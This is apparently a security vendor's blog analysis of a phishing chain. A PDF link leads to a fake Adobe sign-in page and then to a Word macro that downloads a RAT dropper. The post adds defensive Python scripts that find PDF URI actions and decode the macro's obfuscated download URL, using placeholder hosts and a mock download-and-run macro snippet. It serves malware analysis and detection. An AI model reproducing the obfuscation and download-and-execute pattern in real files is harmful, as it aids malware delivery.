
Jumping through the hoops: multi-stage malicious PDF spam

We've recently encountered a number of malicious spam messages with PDFs attached. The PDFs themselves are not malicious as they don't contain executable code, but they do contain images with underlying URI actions. The image, if clicked, will open the browser at the specified URL. What follows is an analysis of one of these samples.

Let's start with the email. We only saw a single instance of this message, which indicates to us that it was a low volume campaign. An analysis of the header trail showed the message originated from a real AOL webmail account.


The message included a PDF attachment, "PAYMENT RECEIPT.pdf," which didn't appear to embed any JavaScript or other malicious content. Opening the PDF reveals a blurred image with the suggestion that the document is secured and must be viewed online.


Underlying the image is a URI action that opens a browser and loads a URL.
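As an added example (not code from the original post), the scanner below pulls the targets of `/URI` actions out of a PDF's raw bytes, which is the check a gateway or analyst would run on an attachment like this one before anyone clicks the image. The sample PDF fragment and its URLs are constructed placeholders; the code assumes the link annotation is not inside a compressed object stream.

```python
import re

# A URI action looks like << /S /URI /URI (target) >>; the two keys may appear in
# either order. Assumption: the annotation is stored uncompressed. Annotations
# inside a compressed object stream (/ObjStm) must be inflated first.
URI_ACTION = re.compile(
    rb'<<[^<>]*?/S\s*/URI[^<>]*?/URI\s*\(((?:[^()\\]|\\.)*)\)'
    rb'|<<[^<>]*?/URI\s*\(((?:[^()\\]|\\.)*)\)[^<>]*?/S\s*/URI'
)

def find_uri_actions(pdf: bytes) -> list[str]:
    """Return every URL that a /URI action in the PDF would open."""
    targets = []
    for match in URI_ACTION.finditer(pdf):
        raw = match.group(1) if match.group(1) is not None else match.group(2)
        # PDF literal strings escape parentheses with a backslash.
        raw = raw.replace(b"\\(", b"(").replace(b"\\)", b")")
        targets.append(raw.decode("latin-1"))
    return targets

# Constructed fixture: two link annotations, one per key order. The URLs are
# placeholders, not the ones from the campaign described in the post.
SAMPLE_PDF = (
    b"%PDF-1.4\n"
    b"4 0 obj\n<< /Type /Annot /Subtype /Link /Rect [50 500 400 700]\n"
    b"   /A << /S /URI /URI (http://example.invalid/view-secure-pdf) >> >>\nendobj\n"
    b"5 0 obj\n<< /Type /Annot /Subtype /Link /Rect [0 0 10 10]\n"
    b"   /A << /URI (http://example.invalid/second) /S /URI >> >>\nendobj\n"
)

if __name__ == "__main__":
    for url in find_uri_actions(SAMPLE_PDF):
        print("URI action target:", url)
```

Any URL this returns for a document that claims to be "secured" and viewable only online is the pivot point of the chain and the value worth blocking or detonating.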


The tinyurl redirects to the following web page:


Here we were presented with an alert:


Once we click OK, we're presented with a fake Adobe ID sign-in page.


The form duly accepted some gibberish we entered, which suggests that it's just part of the ruse and not actually harvesting credentials. Anyway, after convincing us we needed to view a secure PDF document online, we were now asked to download a Word Doc file!


Once we save the document and try to open it...what's that? Another blurred image and instructions to enable content:


So, in addition to bad English, the document contains a macro. We must be getting close now. Let's have a look at the macro, which we extracted with oledump.py. As we might expect, the code is obfuscated, but the use of URLDownloadToFileA and ShellExecute lets us surmise that this code is downloading a file and executing it.


Essentially, when the document is opened this macro downloads a file to the temp directory and executes it. Line 36 shows a long string to be decrypted with the Decrypt function on line 49. The Decrypt function first reverses the string, and then applies a simple -1 letter substitution cipher to the ASCII characters, so f becomes e and y becomes x and so on. This reveals the download URL.
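As an added example (not the post's or the macro's own code), the script below re-implements that decoding step in Python so an analyst can recover the obfuscated string from the macro text dumped by oledump.py without ever running the macro. The VBA snippet and the URL inside it are constructed placeholders; applying the -1 shift to every character rather than only to letters is an assumption, since the post only states the shift for letters.

```python
import re

def decrypt(blob: str) -> str:
    """Undo the macro's scheme: reverse the string, then shift every character
    down by one code point (f -> e, y -> x). Assumption: the shift is applied
    to all characters, so ':' decodes from ';' and '/' from '0'."""
    return "".join(chr(ord(c) - 1) for c in reversed(blob))

def encrypt(plain: str) -> str:
    """Inverse of decrypt(); used here only to build the constructed fixture."""
    return "".join(chr(ord(c) + 1) for c in plain)[::-1]

# Constructed fixture: a placeholder URL and a minimal macro in the same shape
# as the one described in the post. Neither is the real campaign artefact.
SAMPLE_URL = "http://example.invalid/payload.exe"
SAMPLE_VBA = (
    "Sub AutoOpen()\n"
    "    Dim u As String\n"
    f'    u = "{encrypt(SAMPLE_URL)}"\n'
    '    Call Fetch(Decrypt(u), Environ("TEMP") & "\\x.exe")\n'
    "End Sub\n"
)

STRING_LITERAL = re.compile(r'"([^"\n]{8,})"')       # long VBA string literals
URL_LIKE = re.compile(r"^(?:https?|ftp)://\S+$", re.IGNORECASE)

def recover_urls(vba_source: str) -> list[str]:
    """Decode every long string literal in the macro text and keep the ones
    that decode to something URL-shaped."""
    found = []
    for literal in STRING_LITERAL.findall(vba_source):
        try:
            decoded = decrypt(literal)
        except ValueError:
            continue  # a character below code point 1: not this scheme
        if URL_LIKE.match(decoded):
            found.append(decoded)
    return found

if __name__ == "__main__":
    for url in recover_urls(SAMPLE_VBA):
        print("decoded download URL:", url)
```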


Upon downloading that file, we had problems getting the sample to run in the lab. It complained about .Net, and then refused to run even after we installed .Net. However, a static analysis of the binary (MD5: 5bb68067ca34e94b875b3c56e3b31e48) revealed a layered, obfuscated .Net dropper that installs Kazy Rootkit and DarkComet RAT, a well-known Remote Access Trojan.

In summary, this type of email attack, where seemingly innocent PDFs contain clickable images that lead to a chain of other nastiness, appears to be on the increase. This is most likely because PDFs are ubiquitous and offer a way for attackers to bury their URLs and potentially bypass email gateway scanning. In this particular case, the use of an additional Word document was also puzzling, as it could easily have been used as the original email attachment. But the manager of this campaign may be aware that email gateways are getting good at blocking macro-based Word malware, which has been extremely prevalent over the past year or so. Perhaps, too, the attacker wanted to reuse their already-existing Word malware and opted to advertise the location of the Word document via the link in the PDF. Even if the malware did run properly, we can't imagine this campaign being very successful for the attacker. Its multi-stage and interactive nature requires a tenacious victim indeed, with just the right software and options enabled. Most people would be suspicious well before the Word document stage.

We have protections in place in the Trustwave Secure Email Gateway for this and other similar campaigns that we have seen.